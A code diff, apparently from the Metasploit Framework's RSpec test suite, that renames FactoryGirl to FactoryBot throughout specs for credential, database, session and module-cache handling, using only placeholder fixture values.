FactoryGirl.create(
FactoryBot.create(
:mdm_workspace
)
end
@ -42,7 +42,7 @@ RSpec.describe Msf::DBManager::Export do
end
let!(:module_details) do
FactoryGirl.create_list(
FactoryBot.create_list(
:mdm_module_detail,
module_detail_count
)

94
spec/lib/msf/ui/console/command_dispatcher/creds_spec.rb
View File

@ -30,30 +30,30 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
let(:nonblank_username) { 'nonblank_user' }
let(:nonblank_password) { 'nonblank_pass' }
let!(:origin) { FactoryGirl.create(:metasploit_credential_origin_import) }
let!(:origin) { FactoryBot.create(:metasploit_credential_origin_import) }
let!(:priv) { FactoryGirl.create(:metasploit_credential_password, data: password) }
let!(:pub) { FactoryGirl.create(:metasploit_credential_username, username: username) }
let!(:blank_pub) { blank_pub = FactoryGirl.create(:metasploit_credential_blank_username) }
let!(:nonblank_priv) { FactoryGirl.create(:metasploit_credential_password, data: nonblank_password) }
let!(:nonblank_pub) { FactoryGirl.create(:metasploit_credential_username, username: nonblank_username) }
let!(:blank_priv) { FactoryGirl.create(:metasploit_credential_password, data: blank_password) }
let!(:priv) { FactoryBot.create(:metasploit_credential_password, data: password) }
let!(:pub) { FactoryBot.create(:metasploit_credential_username, username: username) }
let!(:blank_pub) { blank_pub = FactoryBot.create(:metasploit_credential_blank_username) }
let!(:nonblank_priv) { FactoryBot.create(:metasploit_credential_password, data: nonblank_password) }
let!(:nonblank_pub) { FactoryBot.create(:metasploit_credential_username, username: nonblank_username) }
let!(:blank_priv) { FactoryBot.create(:metasploit_credential_password, data: blank_password) }
before(:example) do
FactoryGirl.create(:metasploit_credential_core,
FactoryBot.create(:metasploit_credential_core,
origin: origin,
private: priv,
public: pub,
realm: nil,
workspace: framework.db.workspace)
FactoryGirl.create(:metasploit_credential_core,
FactoryBot.create(:metasploit_credential_core,
origin: origin,
private: nonblank_priv,
public: blank_pub,
realm: nil,
workspace: framework.db.workspace)
FactoryGirl.create(:metasploit_credential_core,
FactoryBot.create(:metasploit_credential_core,
origin: origin,
private: blank_priv,
public: nonblank_pub,
@ -167,12 +167,12 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
let(:ntlm_hash) { '1443d06412d8c0e6e72c57ef50f76a05:27c433245e4763d074d30a05aae0af2c' }
let!(:pub) do
FactoryGirl.create(:metasploit_credential_username, username: username)
FactoryBot.create(:metasploit_credential_username, username: username)
end
let!(:password_core) do
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
priv = FactoryBot.create(:metasploit_credential_password, data: password)
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: pub,
realm: nil,
@ -182,18 +182,18 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
# # Somehow this is hitting a unique constraint on Cores with the same
# # Public, even though it has a different Private. Skip for now
# let!(:ntlm_core) do
# priv = FactoryGirl.create(:metasploit_credential_ntlm_hash, data: ntlm_hash)
# FactoryGirl.create(:metasploit_credential_core,
# origin: FactoryGirl.create(:metasploit_credential_origin_import),
# priv = FactoryBot.create(:metasploit_credential_ntlm_hash, data: ntlm_hash)
# FactoryBot.create(:metasploit_credential_core,
# origin: FactoryBot.create(:metasploit_credential_origin_import),
# private: priv,
# public: pub,
# realm: nil,
# workspace: framework.db.workspace)
# end
# let!(:nonreplayable_core) do
# priv = FactoryGirl.create(:metasploit_credential_nonreplayable_hash, data: 'asdf')
# FactoryGirl.create(:metasploit_credential_core,
# origin: FactoryGirl.create(:metasploit_credential_origin_import),
# priv = FactoryBot.create(:metasploit_credential_nonreplayable_hash, data: 'asdf')
# FactoryBot.create(:metasploit_credential_core,
# origin: FactoryBot.create(:metasploit_credential_origin_import),
# private: priv,
# public: pub,
# realm: nil,
@ -241,9 +241,9 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
end
end
describe 'Adding' do
let(:pub) { FactoryGirl.create(:metasploit_credential_username, username: username) }
let(:priv) { FactoryGirl.create(:metasploit_credential_password, data: password) }
let(:r) { FactoryGirl.create(:metasploit_credential_realm, key: realm_type, value: realm) }
let(:pub) { FactoryBot.create(:metasploit_credential_username, username: username) }
let(:priv) { FactoryBot.create(:metasploit_credential_password, data: password) }
let(:r) { FactoryBot.create(:metasploit_credential_realm, key: realm_type, value: realm) }
context 'Cores with public privates and realms' do
context 'username password and realm' do
it 'creates a core if one does not exist' do
@ -252,8 +252,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: pub,
realm: r,
@ -270,8 +270,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: nil,
public: pub,
realm: r,
@ -289,8 +289,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: pub,
realm: nil,
@ -308,8 +308,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: nil,
realm: r,
@ -327,8 +327,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: nil,
public: pub,
realm: nil,
@ -346,8 +346,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: nil,
realm: nil,
@ -358,15 +358,15 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
end
end
context 'ntlm' do
let(:priv) { FactoryGirl.create(:metasploit_credential_ntlm_hash) }
let(:priv) { FactoryBot.create(:metasploit_credential_ntlm_hash) }
it 'creates a core if one does not exist' do
expect {
creds.cmd_creds('add', "ntlm:#{priv.data}")
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: nil,
realm: nil,
@ -377,15 +377,15 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
end
end
context 'hash' do
let(:priv) { FactoryGirl.create(:metasploit_credential_nonreplayable_hash) }
let(:priv) { FactoryBot.create(:metasploit_credential_nonreplayable_hash) }
it 'creates a core if one does not exist' do
expect {
creds.cmd_creds('add', "hash:#{priv.data}")
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: nil,
realm: nil,
@ -396,7 +396,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
end
end
context 'ssh-key' do
let(:priv) { FactoryGirl.create(:metasploit_credential_ssh_key) }
let(:priv) { FactoryBot.create(:metasploit_credential_ssh_key) }
before(:each) do
@file = Tempfile.new('id_rsa')
@file.write(priv.data)
@ -408,8 +408,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: priv,
public: pub,
realm: nil,
@ -423,15 +423,15 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Creds do
context 'realm-types' do
Metasploit::Model::Realm::Key::SHORT_NAMES.each do |short_name, long_name|
context "#{short_name}" do
let(:r) { FactoryGirl.create(:metasploit_credential_realm, key: long_name) }
let(:r) { FactoryBot.create(:metasploit_credential_realm, key: long_name) }
it 'creates a core if one does not exist' do
expect {
creds.cmd_creds('add', "realm:#{r.value}", "realm-type:#{short_name}")
}.to change { Metasploit::Credential::Core.count }.by 1
end
it 'does not create a core if it already exists' do
FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
FactoryBot.create(:metasploit_credential_core,
origin: FactoryBot.create(:metasploit_credential_origin_import),
private: nil,
public: nil,
realm: r,

16
spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
View File

@ -215,10 +215,10 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
end
describe "-p" do
before(:example) do
host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1")
FactoryGirl.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp')
FactoryGirl.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp')
FactoryGirl.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp')
host = FactoryBot.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1")
FactoryBot.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp')
FactoryBot.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp')
FactoryBot.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp')
end
it "should list services that are on a given port" do
db.cmd_services "-S", "1024|1025"
@ -235,10 +235,10 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
end
describe "-np" do
before(:example) do
host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1")
FactoryGirl.create(:mdm_service, :host => host, :port => 1024)
FactoryGirl.create(:mdm_service, :host => host, :port => 1025)
FactoryGirl.create(:mdm_service, :host => host, :port => 1026)
host = FactoryBot.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1")
FactoryBot.create(:mdm_service, :host => host, :port => 1024)
FactoryBot.create(:mdm_service, :host => host, :port => 1025)
FactoryBot.create(:mdm_service, :host => host, :port => 1026)
end
it "should list services that are not on a given port" do
skip {

2
spec/support/shared/examples/credential/core/to_credential.rb
View File

@ -5,7 +5,7 @@ RSpec.shared_examples_for 'Metasploit::Credential::Core::ToCredential' do
context ".to_credential" do
subject(:crednetial_core) do
FactoryGirl.create(:metasploit_credential_core)
FactoryBot.create(:metasploit_credential_core)
end
it { is_expected.to respond_to :to_credential }

34
spec/support/shared/examples/msf/db_manager/exploit_attempt.rb
View File

@ -11,15 +11,15 @@ RSpec.shared_examples_for 'Msf::DBManager::ExploitAttempt' do
let(:run) do
match
FactoryGirl.create(:automatic_exploitation_run, user: workspace.owner,workspace:workspace, match_set_id: match_set.id)
FactoryBot.create(:automatic_exploitation_run, user: workspace.owner,workspace:workspace, match_set_id: match_set.id)
end
let(:match_set) do
FactoryGirl.create(:automatic_exploitation_match_set, user: workspace.owner,workspace:workspace)
FactoryBot.create(:automatic_exploitation_match_set, user: workspace.owner,workspace:workspace)
end
let(:match) do
FactoryGirl.create(:automatic_exploitation_match,
FactoryBot.create(:automatic_exploitation_match,
match_set_id: match_set.id,
matchable_id:vuln_with_match.id,
matchable_type: "Mdm::Vuln"
@ -27,19 +27,19 @@ RSpec.shared_examples_for 'Msf::DBManager::ExploitAttempt' do
end
let(:vuln_with_match) do
FactoryGirl.create(:mdm_vuln)
FactoryBot.create(:mdm_vuln)
end
let(:host) do
FactoryGirl.create(:mdm_host, workspace:workspace)
FactoryBot.create(:mdm_host, workspace:workspace)
end
let(:workspace) do
FactoryGirl.create(:mdm_workspace)
FactoryBot.create(:mdm_workspace)
end
let(:refs) do
[ FactoryGirl.create(:mdm_ref) ]
[ FactoryBot.create(:mdm_ref) ]
end
context "with a run" do
@ -137,7 +137,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ExploitAttempt' do
context "without a run" do
let(:vuln) do
FactoryGirl.create(:mdm_vuln)
FactoryBot.create(:mdm_vuln)
end
let(:opts) do
@ -226,20 +226,20 @@ RSpec.shared_examples_for 'Msf::DBManager::ExploitAttempt' do
end
let(:session_id) do
FactoryGirl.create(:session, host: host).id
FactoryBot.create(:session, host: host).id
end
let(:run) do
match
FactoryGirl.create(:automatic_exploitation_run, user: workspace.owner,workspace:workspace, match_set_id: match_set.id)
FactoryBot.create(:automatic_exploitation_run, user: workspace.owner,workspace:workspace, match_set_id: match_set.id)
end
let(:match_set) do
FactoryGirl.create(:automatic_exploitation_match_set, user: workspace.owner,workspace:workspace)
FactoryBot.create(:automatic_exploitation_match_set, user: workspace.owner,workspace:workspace)
end
let(:match) do
FactoryGirl.create(:automatic_exploitation_match,
FactoryBot.create(:automatic_exploitation_match,
match_set_id: match_set.id,
matchable_id:vuln_with_match.id,
matchable_type: "Mdm::Vuln"
@ -247,19 +247,19 @@ RSpec.shared_examples_for 'Msf::DBManager::ExploitAttempt' do
end
let(:vuln_with_match) do
FactoryGirl.create(:mdm_vuln)
FactoryBot.create(:mdm_vuln)
end
let(:host) do
FactoryGirl.create(:mdm_host, workspace:workspace)
FactoryBot.create(:mdm_host, workspace:workspace)
end
let(:workspace) do
FactoryGirl.create(:mdm_workspace)
FactoryBot.create(:mdm_workspace)
end
let(:refs) do
[ FactoryGirl.create(:mdm_ref) ]
[ FactoryBot.create(:mdm_ref) ]
end
context "with a run" do
@ -357,7 +357,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ExploitAttempt' do
context "without a run" do
let(:vuln) do
FactoryGirl.create(:mdm_vuln)
FactoryBot.create(:mdm_vuln)
end
let(:opts) do

16
spec/support/shared/examples/msf/db_manager/import/metasploit_framework/xml.rb
View File

@ -35,7 +35,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import::MetasploitFramework::XML' do
end
let(:host_attributes) do
FactoryGirl.attributes_for(:mdm_host)
FactoryBot.attributes_for(:mdm_host)
end
let(:msf_web_text_element_names) do
@ -65,15 +65,15 @@ RSpec.shared_examples_for 'Msf::DBManager::Import::MetasploitFramework::XML' do
end
let(:service_attributes) do
FactoryGirl.attributes_for(:web_service)
FactoryBot.attributes_for(:web_service)
end
let(:web_form_attributes) do
FactoryGirl.attributes_for(:mdm_web_form, :exported)
FactoryBot.attributes_for(:mdm_web_form, :exported)
end
let(:web_page_attributes) do
FactoryGirl.attributes_for(:mdm_web_page)
FactoryBot.attributes_for(:mdm_web_page)
end
let(:workspace) do
@ -304,7 +304,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import::MetasploitFramework::XML' do
end
let(:web_vuln) do
FactoryGirl.create(:mdm_web_vuln)
FactoryBot.create(:mdm_web_vuln)
end
before(:example) do
@ -345,7 +345,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import::MetasploitFramework::XML' do
context 'without :workspace' do
let(:workspace) do
FactoryGirl.create(:mdm_workspace)
FactoryBot.create(:mdm_workspace)
end
before(:example) do
@ -831,7 +831,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import::MetasploitFramework::XML' do
end
let(:web_vuln_attributes) do
FactoryGirl.attributes_for(:exported_web_vuln)
FactoryBot.attributes_for(:exported_web_vuln)
end
subject(:import_msf_web_vuln_element) do
@ -1150,7 +1150,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import::MetasploitFramework::XML' do
end
let(:web_vuln) do
FactoryGirl.create(:mdm_web_vuln)
FactoryBot.create(:mdm_web_vuln)
end
it 'should call #import_msf_web_vuln_element' do

62
spec/support/shared/examples/msf/db_manager/module_cache.rb
View File

@ -20,7 +20,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_details) do
FactoryGirl.create_list(
FactoryBot.create_list(
:mdm_module_detail,
module_detail_count
)
@ -83,15 +83,15 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let(:mtype) do
FactoryGirl.generate :mdm_module_detail_mtype
FactoryBot.generate :mdm_module_detail_mtype
end
let(:refname) do
FactoryGirl.generate :mdm_module_detail_refname
FactoryBot.generate :mdm_module_detail_refname
end
let!(:module_detail) do
FactoryGirl.create(
FactoryBot.create(
:mdm_module_detail
)
end
@ -106,7 +106,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_detail) do
FactoryGirl.create(:mdm_module_detail)
FactoryBot.create(:mdm_module_detail)
end
context 'with matching Mdm::Module::Detail' do
@ -159,7 +159,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
before(:example) do
Mdm::Module::Detail::STANCES.each do |stance|
FactoryGirl.create(:mdm_module_detail, :stance => stance)
FactoryBot.create(:mdm_module_detail, :stance => stance)
end
end
@ -203,7 +203,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_authors) do
FactoryGirl.create_list(:mdm_module_author, 2)
FactoryBot.create_list(:mdm_module_author, 2)
end
let(:target_module_author) do
@ -258,7 +258,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:existing_module_details) do
FactoryGirl.create_list(:mdm_module_detail, 2)
FactoryBot.create_list(:mdm_module_detail, 2)
end
let(:target_module_detail) do
@ -305,7 +305,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
context 'with ref keyword' do
let(:ref) do
FactoryGirl.generate :mdm_module_ref_name
FactoryBot.generate :mdm_module_ref_name
end
let(:search_string) do
@ -314,7 +314,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_ref) do
FactoryGirl.create(:mdm_module_ref)
FactoryBot.create(:mdm_module_ref)
end
context 'with Mdm::Module::Ref#name' do
@ -344,7 +344,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
context 'with type keyword' do
let(:type) do
FactoryGirl.generate :mdm_module_detail_mtype
FactoryBot.generate :mdm_module_detail_mtype
end
let(:search_string) do
@ -356,7 +356,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:all_module_details) do
FactoryGirl.create_list(:mdm_module_detail, 2)
FactoryBot.create_list(:mdm_module_detail, 2)
end
context 'with Mdm::Module::Ref#name' do
@ -389,7 +389,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_action) do
FactoryGirl.create(:mdm_module_action)
FactoryBot.create(:mdm_module_action)
end
it 'should match Mdm::Module::Action#name' do
@ -411,7 +411,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_arch) do
FactoryGirl.create(:mdm_module_arch)
FactoryBot.create(:mdm_module_arch)
end
it 'should match Mdm::Module::Arch#name' do
@ -433,7 +433,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_author) do
FactoryGirl.create(:mdm_module_author)
FactoryBot.create(:mdm_module_author)
end
it 'should match Mdm::Module::Author#name' do
@ -455,7 +455,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:all_module_details) do
FactoryGirl.create_list(:mdm_module_detail, 3)
FactoryBot.create_list(:mdm_module_detail, 3)
end
context 'with #description' do
@ -515,7 +515,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_platform) do
FactoryGirl.create(:mdm_module_platform)
FactoryBot.create(:mdm_module_platform)
end
it 'should match Mdm::Module::Platform#name' do
@ -537,7 +537,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_ref) do
FactoryGirl.create(:mdm_module_ref)
FactoryBot.create(:mdm_module_ref)
end
it 'should match Mdm::Module::Ref#name' do
@ -559,7 +559,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let!(:module_target) do
FactoryGirl.create(:mdm_module_target)
FactoryBot.create(:mdm_module_target)
end
it 'should match Mdm::Module::Target#name' do
@ -663,7 +663,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
let!(:module_detail) do
# needs to reference a real module so that it can be loaded
FactoryGirl.create(
FactoryBot.create(
:mdm_module_detail,
:file => module_pathname.to_path,
:mtime => modification_time,
@ -836,15 +836,15 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let(:privileged) do
FactoryGirl.generate :mdm_module_detail_privileged
FactoryBot.generate :mdm_module_detail_privileged
end
let(:rank) do
FactoryGirl.generate :mdm_module_detail_rank
FactoryBot.generate :mdm_module_detail_rank
end
let(:stance) do
FactoryGirl.generate :mdm_module_detail_stance
FactoryBot.generate :mdm_module_detail_stance
end
before(:example) do
@ -885,7 +885,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
context 'with :action' do
let(:name) do
FactoryGirl.generate :mdm_module_action_name
FactoryBot.generate :mdm_module_action_name
end
let(:bits) do
@ -922,7 +922,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
context 'with :arch' do
let(:name) do
FactoryGirl.generate :mdm_module_arch_name
FactoryBot.generate :mdm_module_arch_name
end
let(:bits) do
@ -959,11 +959,11 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
context 'with :author' do
let(:email) do
FactoryGirl.generate :mdm_module_author_email
FactoryBot.generate :mdm_module_author_email
end
let(:name) do
FactoryGirl.generate :mdm_module_author_name
FactoryBot.generate :mdm_module_author_name
end
let(:bits) do
@ -1011,7 +1011,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let(:name) do
FactoryGirl.generate :mdm_module_platform_name
FactoryBot.generate :mdm_module_platform_name
end
it 'should create an Mdm::Module::Platform' do
@ -1048,7 +1048,7 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let(:name) do
FactoryGirl.generate :mdm_module_ref_name
FactoryBot.generate :mdm_module_ref_name
end
it 'should create an Mdm::Module::Ref' do
@ -1086,11 +1086,11 @@ RSpec.shared_examples_for 'Msf::DBManager::ModuleCache' do
end
let(:index) do
FactoryGirl.generate :mdm_module_target_index
FactoryBot.generate :mdm_module_target_index
end
let(:name) do
FactoryGirl.generate :mdm_module_target_name
FactoryBot.generate :mdm_module_target_name
end
it 'should create an Mdm::Module::Target' do

4
spec/support/shared/examples/msf/db_manager/search_modules/mdm_module_platform_name_or_mdm_module_target_name_keyword.rb
View File

@ -5,11 +5,11 @@ RSpec.shared_examples_for 'Msf::DBManager#search_modules Mdm::Module::Platform#n
end
let!(:module_platform) do
FactoryGirl.create(:mdm_module_platform)
FactoryBot.create(:mdm_module_platform)
end
let!(:module_target) do
FactoryGirl.create(:mdm_module_target)
FactoryBot.create(:mdm_module_target)
end
context 'with Mdm::Module::Platform#name' do

4
spec/support/shared/examples/msf/db_manager/search_modules/mdm_module_ref_name_keyword.rb
View File

@ -5,7 +5,7 @@ RSpec.shared_examples_for 'Msf::DBManager#search_modules Mdm::Module::Ref#name k
end
let(:name) do
FactoryGirl.generate :mdm_module_ref_name
FactoryBot.generate :mdm_module_ref_name
end
let(:search_string) do
@ -13,7 +13,7 @@ RSpec.shared_examples_for 'Msf::DBManager#search_modules Mdm::Module::Ref#name k
end
before(:example) do
FactoryGirl.create(:mdm_module_ref, :name => name)
FactoryBot.create(:mdm_module_ref, :name => name)
end
name_prefix = "#{keyword.to_s.upcase}-"

24
spec/support/shared/examples/msf/db_manager/session.rb
View File

@ -33,7 +33,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
end
let(:host) do
FactoryGirl.create(:mdm_host, :workspace => session_workspace)
FactoryBot.create(:mdm_host, :workspace => session_workspace)
end
let(:module_instance) do
@ -50,7 +50,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
end
let(:options_workspace) do
FactoryGirl.create(:mdm_workspace)
FactoryBot.create(:mdm_workspace)
end
let(:parent_module_fullname) do
@ -95,7 +95,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
end
let(:session_workspace) do
FactoryGirl.create(:mdm_workspace)
FactoryBot.create(:mdm_workspace)
end
before(:example) do
@ -115,7 +115,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
}
)
FactoryGirl.create(
FactoryBot.create(
:mdm_module_detail,
:fullname => parent_module_fullname,
:name => parent_module_name
@ -128,11 +128,11 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
end
let(:match_set) do
FactoryGirl.create(:automatic_exploitation_match_set, user: session_workspace.owner,workspace:session_workspace)
FactoryBot.create(:automatic_exploitation_match_set, user: session_workspace.owner,workspace:session_workspace)
end
let(:run) do
FactoryGirl.create(:automatic_exploitation_run, workspace: session_workspace, match_set_id: match_set.id)
FactoryBot.create(:automatic_exploitation_run, workspace: session_workspace, match_set_id: match_set.id)
end
let(:user_data) do
@ -175,7 +175,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
context 'with session responds to arch' do
let(:arch) do
FactoryGirl.generate :mdm_host_arch
FactoryBot.generate :mdm_host_arch
end
before(:example) do
@ -306,7 +306,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
end
let(:service) do
FactoryGirl.create(
FactoryBot.create(
:mdm_service,
:host => host
)
@ -504,7 +504,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
context 'with session responds to arch' do
let(:arch) do
FactoryGirl.generate :mdm_host_arch
FactoryBot.generate :mdm_host_arch
end
before(:example) do
@ -635,7 +635,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
end
let(:service) do
FactoryGirl.create(
FactoryBot.create(
:mdm_service,
:host => host
)
@ -818,7 +818,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
context 'with Mdm::Host' do
let(:host) do
FactoryGirl.create(:mdm_host)
FactoryBot.create(:mdm_host)
end
context 'created Mdm::Session' do
@ -923,7 +923,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Session' do
context 'with :routes' do
let(:routes) do
FactoryGirl.build_list(
FactoryBot.build_list(
:mdm_route,
1,
:session => nil

2
spec/support/shared/examples/msf/module_manager/cache.rb
View File

@ -311,7 +311,7 @@ RSpec.shared_examples_for 'Msf::ModuleManager::Cache' do
#
let!(:mdm_module_detail) do
FactoryGirl.create(:mdm_module_detail,
FactoryBot.create(:mdm_module_detail,
:file => path,
:mtype => type,
:mtime => pathname.mtime,